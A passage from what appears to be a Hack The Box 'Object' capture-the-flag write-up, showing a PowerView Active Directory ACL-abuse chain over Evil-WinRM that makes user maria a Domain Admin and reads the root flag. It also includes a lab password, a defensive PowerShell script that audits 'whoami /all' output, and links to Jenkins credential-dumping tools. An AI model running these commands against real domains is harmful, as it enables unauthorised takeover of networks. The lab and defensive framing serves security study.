*Evil-WinRM* PS C:\Users\maria\Documents> 

This does not tell us much more, but we already know maria can modify the ownership of the Domain Admins group (dangerous!!).

Modifying Group Ownership

First, to confirm this once more, we look for any 'interesting DACLs':

*Evil-WinRM* PS C:\Users\maria\Documents> Set-ExecutionPolicy Bypass -Scope CurrentUser
*Evil-WinRM* PS C:\Users\maria\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\maria\Documents> Find-InterestingDomainAcl | ? {$_.ObjectDN -eq "CN=Domain Admins,CN=Users,DC=object,DC=local" -and $_.IdentityReferenceName -eq "maria"}


ObjectDN                : CN=Domain Admins,CN=Users,DC=object,DC=local
AceQualifier            : AccessAllowed
ActiveDirectoryRights   : WriteOwner
ObjectAceType           : None
AceFlags                : None
AceType                 : AccessAllowed
InheritanceFlags        : None
SecurityIdentifier      : S-1-5-21-4088429403-1159899800-2753317549-1106
IdentityReferenceName   : maria
IdentityReferenceDomain : object.local
IdentityReferenceDN     : CN=maria garcia,CN=Users,DC=object,DC=local
IdentityReferenceClass  : user

Again with PowerView, we change the ownership to maria, which allows us to add new ACLs:

*Evil-WinRM* PS C:\Users\maria\Documents> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria' -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=maria)(name=maria)(displayname=maria))))
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))
Verbose: [Set-DomainObjectOwner] Attempting to set the owner for 'Domain Admins' to 'maria'

Now that maria is the owner, we can add a new ACL to gain full control of the group and add this account as a member of the 'Domain Admins' group, giving us Domain Administrator access:

*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainGroupMember -Identity 'Domain Admins' -Members maria
*Evil-WinRM* PS C:\Users\maria\Documents> net group "Domain Admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            maria
The command completed successfully.

For the new group membership to take effect, we need a new session, so we log in as maria once more and validate:

┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'maria' -p 'W3llcr4ft3d_4cls'

Evil-WinRM shell v3.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106


GROUP INFORMATION
-----------------

Group Name                                    Type             SID                                           Attributes
============================================= ================ ============================================= ===============================================================
Everyone                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users               Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                 Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access    Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK                          Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users              Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins                          Group            S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias            S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication              Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level          Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users\Administrator\ -Recurse


    Directory: C:\Users\Administrator


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        8/24/2021   7:51 AM                3D Objects
d-r---        8/24/2021   7:51 AM                Contacts
d-r---       12/16/2021   9:11 AM                Desktop
d-r---       10/25/2021   8:40 PM                Documents
d-r---       10/22/2021   3:33 AM                Downloads
d-r---        8/24/2021   7:51 AM                Favorites
d-r---        8/24/2021   7:51 AM                Links
d-r---        8/24/2021   7:51 AM                Music
d-r---        8/24/2021   7:51 AM                Pictures
d-r---        8/24/2021   7:51 AM                Saved Games
d-r---        8/24/2021   7:51 AM                Searches
d-r---        8/24/2021   7:51 AM                Videos


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       10/10/2022   6:56 AM             34 root.txt


    Directory: C:\Users\Administrator\Favorites


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        8/24/2021   7:51 AM                Links
-a----        8/24/2021   7:51 AM            208 Bing.url


    Directory: C:\Users\Administrator\Links


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        8/24/2021   7:51 AM            518 Desktop.lnk
-a----        8/24/2021   7:51 AM            975 Downloads.lnk


As we can see, maria's token now carries both BUILTIN\Administrators and OBJECT\Domain Admins, so we can access everything on the system, including the contents of the Administrator's home directory. Let's continue and retrieve the root flag as if this was part of the OSCP (using ipconfig and type):

*Evil-WinRM* PS C:\Users\maria\Documents> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::13f
   IPv6 Address. . . . . . . . . . . : dead:beef::f8b8:c26c:96a:3a91
   Link-local IPv6 Address . . . . . : fe80::f8b8:c26c:96a:3a91%12
   IPv4 Address. . . . . . . . . . . : 10.129.96.147
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f8ec%12
                                       10.129.0.1
*Evil-WinRM* PS C:\Users\maria\Documents> type C:\Users\Administrator\Desktop\root.txt
6ad590********************552c43

AND we got root!!
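The whoami output above is exactly what a defender should be watching for: a regular user whose token suddenly carries Administrators, Domain Admins and privileges such as SeDebugPrivilege. The following is an added example of my own (PowerShell, not code from this walkthrough, from PowerView or from Evil-WinRM) that parses `whoami /all` lines and reports the group memberships and enabled privileges that make a token effectively administrative. The privileged-SID, RID and privilege lists are my assumptions and should be tuned per environment; the sample lines are taken from the session above.

```powershell
# Added example (not part of the original walkthrough): audit `whoami /all`
# output and flag what makes the token an administrator / domain admin.
# The lists below are this editor's assumptions, not anything from the page.

# Well-known local SIDs that amount to local administrative control.
$privilegedSids = @{
    'S-1-5-32-544' = 'BUILTIN\Administrators'
    'S-1-5-32-548' = 'BUILTIN\Account Operators'
    'S-1-5-32-551' = 'BUILTIN\Backup Operators'
}
# Domain-relative RIDs (the last component of an S-1-5-21-... SID) that
# equal control of the whole domain or forest.
$privilegedRids = @{
    '512' = 'Domain Admins'
    '518' = 'Schema Admins'
    '519' = 'Enterprise Admins'
}
# Privileges that on their own let a process reach SYSTEM or read any file.
$sensitivePrivileges = @(
    'SeDebugPrivilege', 'SeBackupPrivilege', 'SeRestorePrivilege',
    'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege',
    'SeImpersonatePrivilege', 'SeEnableDelegationPrivilege'
)

function Get-TokenRiskReport {
    <#
    .SYNOPSIS
    Parses `whoami /all` lines and returns the high-risk group and privilege rows.
    .EXAMPLE
    whoami /all | Get-TokenRiskReport | Format-Table -AutoSize
    #>
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string[]]$WhoamiLines
    )
    begin {
        # Group rows: "<name>  <Type>  <SID>  <Attributes>" (name may contain spaces
        # and a backslash; the type keyword and SID anchor the parse).
        $groupRe = '^(?<name>.+?)\s+(?<type>Well-known group|Alias|Group|Label)\s+(?<sid>S-1-[\d-]+)'
        # Privilege rows: "<SePrivilege>  <description>  Enabled|Disabled"
        $privRe  = '^(?<priv>Se\w+Privilege)\s+.+?\s+(?<state>Enabled|Disabled)\s*$'
    }
    process {
        foreach ($line in $WhoamiLines) {
            if ($line -match $groupRe) {
                $sid    = $Matches['sid']
                $rid    = $sid.Split('-')[-1]
                $reason = $null
                if ($privilegedSids.ContainsKey($sid)) {
                    $reason = $privilegedSids[$sid]
                }
                elseif ($sid -like 'S-1-5-21-*' -and $privilegedRids.ContainsKey($rid)) {
                    $reason = $privilegedRids[$rid]
                }
                if ($reason) {
                    [pscustomobject]@{ Kind = 'Group'; Name = $Matches['name']; Sid = $sid; Reason = "member of $reason" }
                }
            }
            elseif ($line -match $privRe) {
                if ($Matches['state'] -eq 'Enabled' -and $sensitivePrivileges -contains $Matches['priv']) {
                    [pscustomobject]@{ Kind = 'Privilege'; Name = $Matches['priv']; Sid = $null; Reason = 'sensitive privilege enabled' }
                }
            }
        }
    }
}

# Sample input: a subset of the `whoami /all` output from the session above,
# embedded here so the function can be exercised offline.
$sample = @'
Everyone                                      Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users               Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                        Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group, Group owner
OBJECT\Domain Admins                          Group            S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias            S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level          Label            S-1-16-12288
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
'@ -split "`r?`n"

# Expected: Administrators, Domain Admins, SeBackupPrivilege, SeDebugPrivilege.
$sample | Get-TokenRiskReport | Format-Table -AutoSize
```

Pipe the live `whoami /all` into the function to audit the current session, or feed it saved output collected from endpoints; anything it reports for an account that is not supposed to be an administrator is exactly the kind of group or privilege change that the PowerView steps earlier in this walkthrough produce.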

The Jenkins credential-decryption step earlier in this walkthrough (scheduling a job, collecting the required credential files and decrypting them offline with the tool) relied on the following sources:

  • Scheduling a Job in Jenkins
  • Accessing and dumping Jenkins credentials
  • https://github.com/gquere/pwn_jenkins
  • Codurance
  • jenkins_offline_decryptor.py